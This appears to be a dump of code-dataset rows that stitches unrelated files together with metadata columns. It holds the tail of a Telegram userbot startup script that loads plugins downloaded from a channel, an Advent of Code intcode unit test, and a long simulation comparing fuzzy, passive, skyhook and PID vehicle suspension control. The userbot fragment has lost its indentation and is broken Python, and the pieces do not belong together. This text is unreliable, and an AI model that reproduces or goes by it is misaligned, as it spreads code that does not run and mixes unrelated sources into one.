bot.loop.run_until_complete(add_bot(Var.TG_BOT_USER_NAME_BF_HER))
else:
bot.start()
except BaseException as er:
sed.info(er)
async def a():
sed.info("Connecting...") ;
o = ""
la = 0
try:
await bot.start() ; sed.info("beastx connected") ; o = "client"
except:
sed.info("Telegram String Session Wrong or Expired Please Add new one ") ; quit(1)
import glob
async def a():
documentss = await bot.get_messages(plugin_channel, None , filter=InputMessagesFilterDocument)
total = int(documentss.total)
total_doxx = range(0, total)
for ixo in total_doxx:
mxo = documentss[ixo].id
downloaded_file_name = await bot.download_media(await bot.get_messages(plugin_channel, ids=mxo), "beastx/modules/")
if "(" not in downloaded_file_name:
path1 = Path(downloaded_file_name)
shortname = path1.stem
load_module(shortname.replace(".py", ""))
sed.info("Installed Plugin `{}` successfully.".format(os.path.basename(downloaded_file_name)))
else:
sed.info("Plugin `{}` has been pre-installed and cannot be installed.".format(os.path.basename(downloaded_file_name)))
logger_group = Var.PRIVATE_GROUP_ID
if not str(logger_group).startswith("-100"):
try:
bot.loop.run_until_complete(autopilot())
except BaseException as er:
print(er)
else:
pass
bot.loop.run_until_complete(a())
path = "beastx/modules/*.py"
files = glob.glob(path)
for name in files:
with open(name) as f:
path1 = Path(f.name)
shortname = path1.stem
load_module(shortname.replace(".py", ""))
if Config.ENABLE_ASSISTANTBOT == "ENABLE":
path = "beastx/modules/assistant/*.py"
files = glob.glob(path)
for name in files:
with open(name) as f:
path1 = Path(f.name)
shortname = path1.stem
start_assistant(shortname.replace(".py", ""))
sed.info("beastx And Assistant Bot Have Been Installed Successfully !")
sed.info("---------------------------------------")
sed.info("------------@BeastX_Userbot------------")
sed.info("---------------------------------------")
else:
sed.info("beastx Has Been Installed Sucessfully !")
sed.info("Hope you will enjoy")
#await bot.send_message(chat_id,MSG)
#else:
# sed.info("your Get_Msg disable")
bot.run_until_disconnected()
| 28.652406
| 140
| 0.58044
| 0
| 0
| 0
| 0
| 0
| 0
| 1,427
| 0.258843
| 1,848
| 0.335208
|
8bac89c0e7fe595c62cbe29b2411dd910e49d2c2
| 859
|
py
|
Python
|
tests/day02/test_day02.py
|
SebastiaanZ/aoc-2019
|
e1fe4630b0f375be0b79398e07e23b9c0196efbb
|
[
"MIT"
] | 3
|
2019-12-02T19:38:14.000Z
|
2020-01-28T00:06:09.000Z
|
tests/day02/test_day02.py
|
SebastiaanZ/aoc-2019
|
e1fe4630b0f375be0b79398e07e23b9c0196efbb
|
[
"MIT"
] | 6
|
2020-03-24T17:58:40.000Z
|
2022-03-12T00:18:45.000Z
|
tests/day02/test_day02.py
|
SebastiaanZ/aoc-2019
|
e1fe4630b0f375be0b79398e07e23b9c0196efbb
|
[
"MIT"
] | null | null | null |
import unittest
from solutions.day02.solution import ship_computer
from tests.helpers import Puzzle
class DayTwoTests(unittest.TestCase):
"""Tests for my solutions to Day 1 of the Advent of Code 2019."""
def test_ship_computer_with_example_data(self):
"""Test the ship computer used for day 2 using the example data provided in the puzzle."""
test_cases = (
Puzzle(data=[1, 9, 10, 3, 2, 3, 11, 0, 99, 30, 40, 50], answer=3500),
)
for puzzle in test_cases:
with self.subTest(data=puzzle.data, answer=puzzle.answer):
# We don't have a noun or verb, so fake it by supplying the values already in place
noun = puzzle.data[1]
verb = puzzle.data[2]
self.assertEqual(ship_computer(puzzle.data, noun=noun, verb=verb), puzzle.answer)
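# Hedged sketch (editor's addition) of the ship_computer the test imports: a
# minimal Day-2 intcode interpreter, assuming only opcodes 1 (add), 2 (multiply)
# and 99 (halt), consistent with the example data above. It is not the author's
# actual implementation, only one that satisfies the test case.
def _ship_computer_sketch(program, noun, verb):
    mem = list(program)
    mem[1], mem[2] = noun, verb  # install the requested inputs
    ip = 0
    while mem[ip] != 99:
        op, a, b, out = mem[ip:ip + 4]
        mem[out] = mem[a] + mem[b] if op == 1 else mem[a] * mem[b]
        ip += 4
    return mem[0]  # e.g. 3500 for the example program with noun=9, verb=10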
| 37.347826
| 99
| 0.641444
| 755
| 0.878929
| 0
| 0
| 0
| 0
| 0
| 0
| 238
| 0.277066
|
8bacb9d61c16b4122f25721e214182358d00a686
| 24,678
|
py
|
Python
|
ActiveSuspensions/2DOF Fuzzy Suspension.py
|
MarcoFerrari128/Portfolio
|
82cd81a4235dbd804cd13100b2304a04ca6771b5
|
[
"MIT"
] | null | null | null |
ActiveSuspensions/2DOF Fuzzy Suspension.py
|
MarcoFerrari128/Portfolio
|
82cd81a4235dbd804cd13100b2304a04ca6771b5
|
[
"MIT"
] | null | null | null |
ActiveSuspensions/2DOF Fuzzy Suspension.py
|
MarcoFerrari128/Portfolio
|
82cd81a4235dbd804cd13100b2304a04ca6771b5
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import ode
import FLC
import pyprind
from numpy.linalg import eig
import pandas as pd
def impulse(length):
    i = 0
    Impulse = []
    while i < length:
        if i == 99:
            Impulse.append(1)
        else:
            Impulse.append(0)
        i += 1
    return 0.1 * np.array(Impulse)
def bump():
i = 0
Bump = []
while i < 1:
if i <= 0.5625 and i >= 0.5:
Bump.append(0.05 * (1 - np.cos(32 * np.pi * i)))
else:
Bump.append(0)
i += 0.001
return np.array(Bump)
def step(length):
    i = 0
    Step = []
    while i < length:
        if i <= 500:
            Step.append(0)
        else:
            Step.append(1)
        i += 1
    return 0.1 * np.array(Step)
def rough2(length):
    """Random road condition.

    Every 10 time samples a new random value is drawn. This simulates a car
    moving on a road at 36 km/h with roughness patches about 1 cm wide.
    """
    i = 0
    Rough = []
    while i < length/10:
j = 0
sample = np.random.randn() # setting correct max height
while j < 10: # add the same value for 10 time steps
Rough.append(sample)
j += 1
i += 1
return 0.1 * np.array(Rough) / np.max(Rough) / 2
def rough3(length):
    """Road condition defined by the ISO 8608 standard."""
    k = 3  # ISO road condition
    N = length + 1  # data points
    L = 10  # length of road profile
B = L / N # sampling interval
n0 = 0.1
dn = 1 / L # Frequency band
n = np.arange(dn, N*dn, dn) # frequency band
phi = 2 * np.pi * (np.random.rand(len(n)))
Amp1 = np.sqrt(dn) * (2**k) * (1e-3) * n0/n
x = np.arange(0, L-B, B)
hx = np.zeros(len(x))
for i in np.arange(len(x)):
hx[i] = np.sum(Amp1 * np.cos(2 * np.pi * n * x[i] + phi))
return 0.1 * hx / np.max(hx)
def rough():
"""Reading values from file Rough.txt"""
f = open('Rough.txt','r')
RoughList = []
for line in f:
RoughList.append(float(line))
return np.array(RoughList)
def RMS(array):
"""Calculates the root-mean-squared value of an array.
"""
return np.sqrt(array @ array / array.size)
def derivate(array, step=100):
"""Calculates the first order derivative of an array. It differs from
np.diff because this returns an array of the same lenght as the input one.
It becomes useful for plotting.
"""
deriv = np.zeros_like(array)
deriv[0] = array[1] - array[0]
deriv[1:] = np.diff(array)
return deriv * step
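# Hedged check (editor's addition): with the default step=100 (i.e. dt=0.01),
# derivate() of t**2 sampled on [0, 1) approximates 2*t away from the first
# sample, where the forward difference is duplicated.
_t = np.arange(0, 1, 0.01)
assert np.allclose(derivate(_t**2)[1:], 2*_t[1:], atol=0.02)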
# =============================================================================
# Importing values of PID
# =============================================================================
StepPID = pd.read_excel('Scalino.xlsx')
StepPID = np.asarray(StepPID)
ImpulsePID = pd.read_excel('impulso.xlsx')
ImpulsePID = np.asarray(ImpulsePID)
BumpPID = pd.read_excel('BumpPID.xlsx')
BumpPID = np.asarray(BumpPID)
RoughPID = pd.read_excel('Rough.xlsx')
RoughPID = np.asarray(RoughPID)
# =============================================================================
# STATE SPACE REPRESENTATION
# x1 = x_body
# x2 = x_wheel
# x3 = x_body'
# x4 = x_wheel'
# =============================================================================
# Main spring stiffness
k_s = 15000 # N/m
# Sprung mass
m_b = 250 # kg
# Viscous damper
c_s = 1000 # N/(m/s)
# Unsprung mass (wheel)
m_w = 30 # kg
# Tyre stiffness
k_t = 150000 # N/m
# Skyhook damping
c_sky = 1000 # N/(m/s)
# Different road simulations
Impulse = impulse(1000)
Step = step(1000)
Bump = bump()
Rough = rough()
def fuzzySuspensionModel(timeScale, state, road):
x1, x2, x3, x4 = state
fuzzyForce = FLC.FLC(x1 - x2, x3)
xdot1 = x3
xdot2 = x4
xdot3 = (-k_s / m_b * x1 + k_s / m_b * x2 - c_s /
m_b * x3 + c_s / m_b * x4 + 1 / m_b * fuzzyForce)
xdot4 = (k_s / m_w * x1 - (k_t + k_s) / m_w * x2 + c_s / m_w * x3 -
c_s / m_w * x4 + k_t / m_w * road - 1 / m_w * fuzzyForce)
return np.array([xdot1, xdot2, xdot3, xdot4])
def passiveSuspensionModel(timeScale, state, road):
x1, x2, x3, x4 = state
xdot1 = x3
xdot2 = x4
xdot3 = -k_s / m_b * x1 + k_s / m_b * x2 - c_s / m_b * x3 + c_s / m_b * x4
xdot4 = (k_s / m_w * x1 - (k_t + k_s) / m_w * x2 + c_s /
m_w * x3 - c_s / m_w * x4 + k_t / m_w * road)
return np.array([xdot1, xdot2, xdot3, xdot4])
def skyhookSuspensionModel(timeScale, state, road):
x1, x2, x3, x4 = state
xdot1 = x3
xdot2 = x4
xdot3 = (-k_s / m_b * x1 + k_s / m_b * x2 - c_s / m_b * x3 + c_s / m_b * x4
- c_sky / m_b * x3)
xdot4 = (k_s / m_w * x1 - (k_t + k_s) / m_w * x2 + c_s /
m_w * x3 - c_s / m_w * x4 + k_t / m_w * road)
return np.array([xdot1, xdot2, xdot3, xdot4])
# =============================================================================
# ## ODE solution - fuzzy
# =============================================================================
# Step
solStep = ode(fuzzySuspensionModel).set_integrator('dopri5',
atol=1e-6)
state0 = [0, 0, 0, 0]
solStep.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
StepState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Step')
while solStep.successful() and solStep.t < tFin:
solStep.set_f_params(Step[counter])
solStep.integrate(solStep.t + dt)
StepState.append(solStep.y)
Time.append(solStep.t)
counter += 1
progress.update()
Time = np.asarray(Time)
StepState = np.asarray(StepState)
# Impulse
solImpulse = ode(fuzzySuspensionModel).set_integrator('dopri5',
atol=1e-6)
state0 = [0, 0, 0, 0]
solImpulse.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
ImpulseState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Impulse')
while solImpulse.successful() and solImpulse.t < tFin:
solImpulse.set_f_params(Impulse[counter])
solImpulse.integrate(solImpulse.t + dt)
ImpulseState.append(solImpulse.y)
Time.append(solImpulse.t)
counter += 1
progress.update()
Time = np.asarray(Time)
ImpulseState = np.asarray(ImpulseState)
# Bump
solBump = ode(fuzzySuspensionModel).set_integrator('dopri5',
atol=1e-6)
state0 = [0, 0, 0, 0]
solBump.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
BumpState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Bump')
while solBump.successful() and solBump.t < tFin:
solBump.set_f_params(Bump[counter])
solBump.integrate(solBump.t + dt)
BumpState.append(solBump.y)
Time.append(solBump.t)
counter += 1
progress.update()
Time = np.asarray(Time)
BumpState = np.asarray(BumpState)
# Rough road
solRough = ode(fuzzySuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solRough.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time = []
RoughState = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Rough')
while solRough.successful() and solRough.t < tFin:
solRough.set_f_params(Rough[counter])
solRough.integrate(solRough.t + dt)
RoughState.append(solRough.y)
Time.append(solRough.t)
counter += 1
progress.update()
Time = np.asarray(Time)
RoughState = np.asarray(RoughState)
# =============================================================================
# ## ODE solution - passive
# =============================================================================
# Step
solStep2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solStep2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
StepState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Step')
while solStep2.successful() and solStep2.t < tFin:
solStep2.set_f_params(Step[counter])
solStep2.integrate(solStep2.t + dt)
StepState2.append(solStep2.y)
Time2.append(solStep2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
StepState2 = np.asarray(StepState2)
# Impulse
solImpulse2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solImpulse2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
ImpulseState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Impulse')
while solImpulse2.successful() and solImpulse2.t < tFin:
solImpulse2.set_f_params(Impulse[counter])
solImpulse2.integrate(solImpulse2.t + dt)
ImpulseState2.append(solImpulse2.y)
Time2.append(solImpulse2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
ImpulseState2 = np.asarray(ImpulseState2)
# Bump
solBump2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solBump2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
BumpState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Bump')
while solBump2.successful() and solBump2.t < tFin:
solBump2.set_f_params(Bump[counter])
solBump2.integrate(solBump2.t + dt)
BumpState2.append(solBump2.y)
Time2.append(solBump2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
BumpState2 = np.asarray(BumpState2)
# Rough road
solRough2 = ode(passiveSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solRough2.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time2 = []
RoughState2 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Rough')
while solRough2.successful() and solRough2.t < tFin:
solRough2.set_f_params(Rough[counter])
solRough2.integrate(solRough2.t + dt)
RoughState2.append(solRough2.y)
Time2.append(solRough2.t)
counter += 1
progress.update()
Time2 = np.asarray(Time2)
RoughState2 = np.asarray(RoughState2)
# =============================================================================
# ## ODE solution - skyhook
# =============================================================================
# Step
solStep3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solStep3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
StepState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Step')
while solStep3.successful() and solStep3.t < tFin:
solStep3.set_f_params(Step[counter])
solStep3.integrate(solStep3.t + dt)
StepState3.append(solStep3.y)
Time3.append(solStep3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
StepState3 = np.asarray(StepState3)
# Impulse
solImpulse3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solImpulse3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
ImpulseState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Impulse')
while solImpulse3.successful() and solImpulse3.t < tFin:
solImpulse3.set_f_params(Impulse[counter])
solImpulse3.integrate(solImpulse3.t + dt)
ImpulseState3.append(solImpulse3.y)
Time3.append(solImpulse3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
ImpulseState3 = np.asarray(ImpulseState3)
# Bump
solBump3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solBump3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
BumpState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Bump')
while solBump3.successful() and solBump3.t < tFin:
solBump3.set_f_params(Bump[counter])
solBump3.integrate(solBump3.t + dt)
BumpState3.append(solBump3.y)
Time3.append(solBump3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
BumpState3 = np.asarray(BumpState3)
# Rough road
solRough3 = ode(skyhookSuspensionModel).set_integrator('dopri5', atol=1e-6)
state0 = [0, 0, 0, 0]
solRough3.set_initial_value(state0)
tFin = 10 - 0.01
dt = 0.01
Time3 = []
RoughState3 = []
counter = 0
progress = pyprind.ProgBar(1000, title='Processing: Rough')
while solRough3.successful() and solRough3.t < tFin:
solRough3.set_f_params(Rough[counter])
solRough3.integrate(solRough3.t + dt)
RoughState3.append(solRough3.y)
Time3.append(solRough3.t)
counter += 1
progress.update()
Time3 = np.asarray(Time3)
RoughState3 = np.asarray(RoughState3)
# =============================================================================
# ACCELERATION EVALUATION (AND FUZZY FORCE)
# =============================================================================
# Step
StepAcc = derivate(StepState[:, 2])
StepAcc2 = derivate(StepState2[:, 2])
StepAcc3 = derivate(StepState3[:, 2])
StepForce = (-k_s * StepState[:, 0] + k_s * StepState[:, 1] -
c_s * StepState[:, 2] + c_s * StepState[:, 3] - StepAcc[:] * m_b)
# Impulse
ImpulseAcc = derivate(ImpulseState[:, 2])
ImpulseAcc2 = derivate(ImpulseState2[:, 2])
ImpulseAcc3 = derivate(ImpulseState3[:, 2])
ImpulseForce = (-k_s * ImpulseState[:, 0] + k_s * ImpulseState[:, 1] -
c_s * ImpulseState[:, 2] + c_s * ImpulseState[:, 3] -
ImpulseAcc[:] * m_b)
# Bump
BumpAcc = derivate(BumpState[:, 2])
BumpAcc2 = derivate(BumpState2[:, 2])
BumpAcc3 = derivate(BumpState3[:, 2])
BumpForce = (-k_s * BumpState[:, 0] + k_s * BumpState[:, 1] -
c_s * BumpState[:, 2] + c_s * BumpState[:, 3] - BumpAcc[:] * m_b)
# Rough
RoughAcc = derivate(RoughState[:, 2])
RoughAcc2 = derivate(RoughState2[:, 2])
RoughAcc3 = derivate(RoughState3[:, 2])
RoughForce = (-k_s * RoughState[:, 0] + k_s * RoughState[:, 1] -
c_s * RoughState[:, 2] + c_s * RoughState[:, 3] -
RoughAcc[:] * m_b)
# =============================================================================
# # PLOTTING
# =============================================================================
# Step
plt.figure(1)
plt.plot(Time, 1e3 * StepState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * StepState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * StepState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(StepPID[:, 0], 1e3 * StepPID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Step, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(2)
plt.plot(Time, 1e3 * StepState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * StepState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * StepState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(StepPID[:, 0], 1e3 * StepPID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(3)
plt.plot(Time, StepAcc, 'C1', label='Fuzzy')
plt.plot(Time2, StepAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, StepAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(StepPID[:, 0], StepPID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, StepForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# Impulse
plt.figure(4)
plt.plot(Time, 1e3 * ImpulseState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * ImpulseState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * ImpulseState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(ImpulsePID[:, 0], 1e3 * ImpulsePID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Impulse, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(5)
plt.plot(Time, 1e3 * ImpulseState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * ImpulseState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * ImpulseState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(ImpulsePID[:, 0], 1e3 * ImpulsePID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(6)
plt.plot(Time, ImpulseAcc, 'C1', label='Fuzzy')
plt.plot(Time2, ImpulseAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, ImpulseAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(ImpulsePID[:, 0], ImpulsePID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, ImpulseForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# Bump
plt.figure(7)
plt.plot(Time, 1e3 * BumpState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * BumpState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * BumpState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(BumpPID[:, 0], 1e3 * BumpPID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Bump, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(8)
plt.plot(Time, 1e3 * BumpState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * BumpState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * BumpState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(BumpPID[:, 0], 1e3 * BumpPID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(9)
plt.plot(Time, BumpAcc, 'C1', label='Fuzzy')
plt.plot(Time2, BumpAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, BumpAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(BumpPID[:, 0], BumpPID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, BumpForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# Rough
plt.figure(10)
plt.plot(Time, 1e3 * RoughState[:, 0], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * RoughState2[:, 0], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * RoughState3[:, 0], 'C3', label='Skyhook', linewidth=1)
plt.plot(RoughPID[:, 0], 1e3 * RoughPID[:, 1], 'C4', label='PID', linewidth=1)
plt.plot(Time, 1e3 * Rough, 'C0', label='Road', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel('Body displacement [mm]')
plt.legend()
plt.figure(11)
plt.plot(Time, 1e3 * RoughState[:, 1], 'C1', label='Fuzzy')
plt.plot(Time2, 1e3 * RoughState2[:, 1], 'C2', label='Passive', linewidth=1)
plt.plot(Time3, 1e3 * RoughState3[:, 1], 'C3', label='Skyhook', linewidth=1)
plt.plot(RoughPID[:, 0], 1e3 * RoughPID[:, 2], 'C4', label='PID', linewidth=1)
plt.xlabel('Time [s]')
plt.ylabel('Unsprung mass displacement [mm]')
plt.legend()
plt.figure(12)
plt.plot(Time, RoughAcc, 'C1', label='Fuzzy')
plt.plot(Time2, RoughAcc2, 'C2', label='Passive', linewidth=1)
plt.plot(Time3, RoughAcc3, 'C3', label='Skyhook', linewidth=1)
plt.plot(RoughPID[:, 0], RoughPID[:, 3], 'C4', label='PID', linewidth=1)
# plt.plot(Time, RoughForce/m_b, 'C0', label='Force', linewidth=0.8)
plt.xlabel('Time [s]')
plt.ylabel(r'Body acceleration [m/${s^2}$]')
plt.legend()
# =============================================================================
# RESULTS
# =============================================================================
# Calculation of RMS for:
# (1) Body displacement
# (2) Body accelaration
# (3) Wheel hop (unsprung mass displacement)
#StepFuzzyRMS = np.array([
# RMS(StepState[:, 0]),
# RMS(StepAcc),
# RMS(StepState[:, 1])
# ])
#
#StepPassiveRMS = np.array([
# RMS(StepState2[:, 0]),
# RMS(StepAcc2),
# RMS(StepState2[:, 1])
# ])
#
#StepSkyhookRMS = np.array([
# RMS(StepState3[:, 0]),
# RMS(StepAcc3),
# RMS(StepState3[:, 1])
# ])
#
#StepResult = np.array([
# (StepFuzzyRMS - StepPassiveRMS) / StepPassiveRMS,
# (StepSkyhookRMS - StepPassiveRMS) / StepPassiveRMS,
# ]) * 100
#
#ImpulseFuzzyRMS = np.array([
# RMS(ImpulseState[:, 0]),
# RMS(ImpulseAcc),
# RMS(ImpulseState[:, 1])
# ])
#
#ImpulsePassiveRMS = np.array([
# RMS(ImpulseState2[:, 0]),
# RMS(ImpulseAcc2),
# RMS(ImpulseState2[:, 1])
# ])
#
#ImpulseSkyhookRMS = np.array([
# RMS(ImpulseState3[:, 0]),
# RMS(ImpulseAcc3),
# RMS(ImpulseState3[:, 1])
# ])
#
#ImpulseResult = np.array([
# (ImpulseFuzzyRMS - ImpulsePassiveRMS) / ImpulsePassiveRMS,
# (ImpulseSkyhookRMS - ImpulsePassiveRMS) / ImpulsePassiveRMS
# ]) * 100
#
#BumpFuzzyRMS = np.array([
# RMS(BumpState[:, 0]),
# RMS(BumpAcc),
# RMS(BumpState[:, 1])
# ])
#
#BumpPassiveRMS = np.array([
# RMS(BumpState2[:, 0]),
# RMS(BumpAcc2),
# RMS(BumpState2[:, 1])
# ])
#
#BumpSkyhookRMS = np.array([
# RMS(BumpState3[:, 0]),
# RMS(BumpAcc3),
# RMS(BumpState3[:, 1])
# ])
#
#BumpResult = np.array([
# (BumpFuzzyRMS - BumpPassiveRMS) / BumpPassiveRMS,
# (BumpSkyhookRMS - BumpPassiveRMS) / BumpPassiveRMS
# ]) * 100
RoughFuzzyRMS = np.array([
RMS(RoughState[:, 0] - Rough),
RMS(RoughAcc),
RMS(RoughState[:, 1] - Rough)
])
RoughPassiveRMS = np.array([
RMS(RoughState2[:, 0] - Rough),
RMS(RoughAcc2),
RMS(RoughState2[:, 1] - Rough)
])
RoughSkyhookRMS = np.array([
RMS(RoughState3[:, 0] - Rough),
RMS(RoughAcc3),
RMS(RoughState3[:, 1] - Rough)
])
RoughPIDRMS = np.array([
RMS(RoughPID[:, 1] - Rough[:-1]),
RMS(RoughPID[:, 3]),
RMS(RoughPID[:, 2] - Rough[:-1])
])
RoughResult = np.array([
(RoughFuzzyRMS - RoughPassiveRMS) / RoughPassiveRMS,
(RoughSkyhookRMS - RoughPassiveRMS) / RoughPassiveRMS,
(RoughPIDRMS - RoughPassiveRMS) / RoughPassiveRMS
]) * 100
#RoughResult = np.array([
# (RoughFuzzyRMS - RMS(Rough)) / RMS(Rough),
# (RoughSkyhookRMS - RMS(Rough)) / RMS(Rough),
# (RoughPIDRMS - RMS(Rough)) / RMS(Rough)
# ]) * 100
# =============================================================================
# FFT ANALYSIS
# =============================================================================
label = ['Fuzzy', 'Passive', 'Skyhook', 'PID']
colors = ['C1', 'C2', 'C3', 'C4']
i = 0
for acc in [StepAcc, StepAcc2, StepAcc3, StepPID[:, 3]]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(13)
plt.loglog(np.abs(freq), np.abs(fft), colors[i], label=label[i],
linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Step')
i = 0
for acc in [ImpulseAcc, ImpulseAcc2, ImpulseAcc3, ImpulsePID[:, 3]]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(14)
plt.loglog(np.abs(freq), np.abs(fft), colors[i], label=label[i],
linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Impulse')
i = 0
for acc in [BumpAcc, BumpAcc2, BumpAcc3]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(15)
plt.loglog(np.abs(freq), np.abs(fft), colors[i],
label=label[i], linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Bump')
i = 0
for acc in [RoughAcc, RoughAcc2, RoughAcc3]:
fft = np.fft.fft(acc)
freq = np.fft.fftfreq(len(acc), 0.01)
plt.figure(16)
plt.loglog(np.abs(freq), np.abs(fft),colors[i],
label=label[i], linewidth=1)
i += 1
plt.legend()
plt.xlabel('Frequency [Hz]')
plt.ylabel('Acceleration')
plt.title('Rough')
| 29.73253
| 82
| 0.56678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,148
| 0.289651
|
8bae7f55a261a7c3c248850c794f2efd73be536a
| 950
|
py
|
Python
|
pywatts/modules/wrappers/dl_wrapper.py
|
KIT-IAI/pyWATTS
|
68993bb51ff272c1a98add31e2b537b63e9d0848
|
[
"MIT"
] | 30
|
2020-10-04T17:32:58.000Z
|
2022-03-18T15:06:39.000Z
|
pywatts/modules/wrappers/dl_wrapper.py
|
KIT-IAI/pyWATTS
|
68993bb51ff272c1a98add31e2b537b63e9d0848
|
[
"MIT"
] | 123
|
2020-10-26T14:42:12.000Z
|
2022-03-31T09:15:55.000Z
|
pywatts/modules/wrappers/dl_wrapper.py
|
KIT-IAI/pyWATTS
|
68993bb51ff272c1a98add31e2b537b63e9d0848
|
[
"MIT"
] | 7
|
2020-10-21T15:13:43.000Z
|
2022-03-07T15:47:49.000Z
